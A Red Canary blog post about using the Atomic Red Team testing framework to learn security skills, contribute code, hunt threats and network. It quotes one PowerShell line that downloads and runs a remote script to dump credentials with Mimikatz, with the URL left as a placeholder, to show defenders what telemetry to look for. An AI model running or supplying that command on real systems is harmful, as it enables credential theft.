July 30, 2020 Atomic Red Team
Brian Donohue

Breaking into infosec and learning new skills with Atomic Red Team

Whether you want to advance your career or are new to information security, Atomic Red Team can help. Here are a slew of tips from the atomic community.

Atomic Red Team serves many needs: validating visibility, testing detection coverage, and emulating adversary behaviors. However, it’s increasingly clear that while the platform was designed with the intention of helping security teams execute simple red team exercises (as the name implies), it may be just as useful as an educational resource.

Over the past few months, countless members of the Atomic Red Team community have demonstrated that the open source testing platform is in fact a tremendously useful tool for kickstarting a new career in information security or advancing an existing career. After a lot of conversation, we decided to host an Atomic Friday as a panel discussion on the early-to-mid-career benefits of Atomic Red Team. We were thrilled to welcome Valentina Palacin, a senior threat intelligence analyst at Deloitte, and Hare Sudhan, an information security intern at a Fortune 100 company, to share their experiences with the tool.

As a supplement to the discussion, this blog features a variety of practical resources on some of the less obvious career benefits of Atomic Red Team, which include:

Gain development experience

Whether you’re looking for a job in offensive or defensive security, are interested in becoming an analyst or an engineer, or perhaps some mix of those things, having at least a cursory understanding of programming and software development can be a valuable attribute. On the one hand, there’s a good chance you’re going to have to build something at some point. It might be a behavioral analytic for detecting some piece of malware, it might be a simple script for automating some terrible drudgery, or it might be something altogether different. On the other hand, as an analyst, you’re almost certain to encounter malware and malicious scripts, and you’ll probably be expected to figure out how those things work.

You’ll gain real-world development experience by contributing tests to Atomic Red Team or features to Invoke-Atomic, a PowerShell-based framework for executing Atomic Red Team tests. It might be a command line or PowerShell script that exercises an execution technique or it might be a module that lets you automate complex testing playbooks. Either way, you’re crafting your coding skill, helping develop a piece of software, and gaining valuable experience.

Getting started as a contributor

Getting started with anything new can be daunting. Fortunately, Atomic Red Team maintainer Carrie Roberts recorded a pair of videos that very clearly and concisely demonstrate how you can become a contributor.

In the first video, Carrie explains how to submit a GitHub pull request for Atomic Red Team—a piece of knowledge that most technical security professionals will probably need at some point in their career. In the process of doing so, she also explains the structure of Atomic Red Team:

In the second video, Carrie more thoroughly explains exactly how you can contribute an atomic test to Atomic Red Team. By watching it, and especially by following along with it at home, you can expect to gain some familiarity with YAML, PowerShell, and Command Prompt. (Plus, if you contribute, you can score a sweet sticker by emailing gear@redcanary.com with your mailing address.)

Now that wasn’t so hard, was it? If you ran into any questions or want to share feedback, join our atomic community on Slack, where you can connect with Carrie and other Atomic Red Team users.

Become familiar with tools and tech

You can become familiar with a great deal of tooling and technology by leveraging Atomic Red Team or Invoke-Atomic. Some tools or software you’re likely to encounter include:

  • PowerShell
  • Virtualization software
  • Endpoint protection and detection tools
  • Native logging and other operating system components
  • And many more!

As an aspiring information security professional, familiarity with any or all of these tools might be important at some point in your career.

If you’re going to experiment with atomics, then you should consider doing so in a virtualized lab environment. Microsoft makes it dead simple to spin up a virtual developer’s environment using either VMware, VirtualBox, Hyper-V, or Parallels. VirtualBox is a free option, and Microsoft’s evaluation Windows VMs require very little customization to install.

Once you’re in that VM, you can learn a lot of the basics of PowerShell by following along with our Invoke-Atomic tutorial series. Even if you are merely examining test details and executing tests without gathering any telemetry or log data, you can learn a good deal about the syntax of PowerShell and how it works on a very basic level.

If you want to take the next step toward thinking about how you can measure the output of the atomics you’ve executed, then it’s worth diving into our Threat Detection Report. It’s a pretty exhaustive examination of prevalent threat techniques, but it also includes information on how you can test those techniques with Atomic Red Team, the telemetry those tests might generate, and the data sources that might collect that telemetry.

Hone your analytical skillset

Outside of the operational benefits of using Atomic Red Team to test your security infrastructure, the testing framework might be most useful as a mechanism for learning what malicious looks like. Ideally, to use Atomic Red Team or Invoke-Atomic in this way, you’ll want to have access to enterprise security tooling like an Endpoint Detection and Response platform. In this way, you can fire tests off on a test machine, and see what telemetry comes out the other end.

However, not everyone has access to tooling like that. Chris Long’s Detection Lab is a great resource for anyone who wants to learn more about how malicious behaviors manifest on an endpoint. That said, understanding how to use Splunk and how to search for certain log data within Splunk are both basic pre-requisites if you want to use Chris’s lab environment.

In the absence of any tooling whatsoever, there’s a lot to be learned from reading through the markdown files in the atomics directory. For nearly any test, the command line or PowerShell scripts are going to convey process information and other telemetry that is valuable for understanding what malicious can look like on an endpoint.

For example, one of the first files in the atomics directory is for tests associated with T1003: OS Credential Dumping. Within that file is a test that’s designed to emulate an adversary using Mimikatz to dump credentials. Here’s the command (although I’ve excluded a link to the remote Mimikatz script):

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

Simply by looking at the test command, you can immediately see that an adversary leveraging Mimikatz might generate telemetry that includes a process that is powershell.exe making an external network connection and a command line parameter like “DownloadString.” These aren’t necessarily malicious together or on their own, but they’re good things to monitor or hunt for.

Speaking of hunting…

Valentina Palacin, who was one of the presenters in our recent Atomic Friday discussion, published an excellent blog a few weeks back about how she’s used Atomic Red Team improve her threat hunting skills. Relying on only open source tooling, Valentina explains how you can set up a lab environment, execute atomics, and then search for evidence created during test execution.

Be sure to watch the video above to learn some of the fundamentals of threat hunting and how to practically apply some of things you have only understood in theory. As she explains in her blog, you’re likely to learn that your hypotheses about what will occur after you execute a test may deviate wildly from what actually happens.

Network with professionals

Last but certainly not least, by contributing to an open source project like Atomic Red Team—and engaging with the community around it—you have the opportunity to meet many seasoned and influential information security professionals.

When you’re in the market for a job, you often hear the phrase: “It’s not what you know, it’s who you know.” In most contexts, this is a reflection on nepotism, but we’ve just spent 1,300 words on the what-you-know part of that phrase. So it doesn’t seem too pessimistic to dedicate a bit of time to the importance of leveraging relationships.

The Atomic Red Team Slack channel has just about every kind of security professional you can imagine: CEOs, CIOs, CTOs, CSOs, CISOs, SOC managers, prominent researchers, red teamers, and blue teamers. These are the people who hire security analysts and engineers. They’re also invaluable sources of expertise, guidance, and information.

By contributing to Atomic Red Team or by being a semi-active member of the Atomic Red Team community, you can develop relationships with people who are established members of the security industry or, at the very least, start developing a (hopefully positive) reputation for yourself among a group of people that you’d like to someday call your peers.

Conclusion

This is just a taste of some of the indirect benefits of Atomic Red Team. As always, if you’re using the platform in interesting ways—or if you’ve used it as an educational resource in ways that we haven’t imagined here—please reach out to us and let us know. We’re always eager to work with new contributors and showcase interesting work on our blog and Atomic Fridays.

 

Test your visibility into the top 10 ATT&CK techniques

 

Comparing open source adversary emulation platforms for red teams

 

Invoke-Atomic leaves the nest

 

Testing initial access with “Generate-Macro” in Atomic Red Team

Subscribe to our blog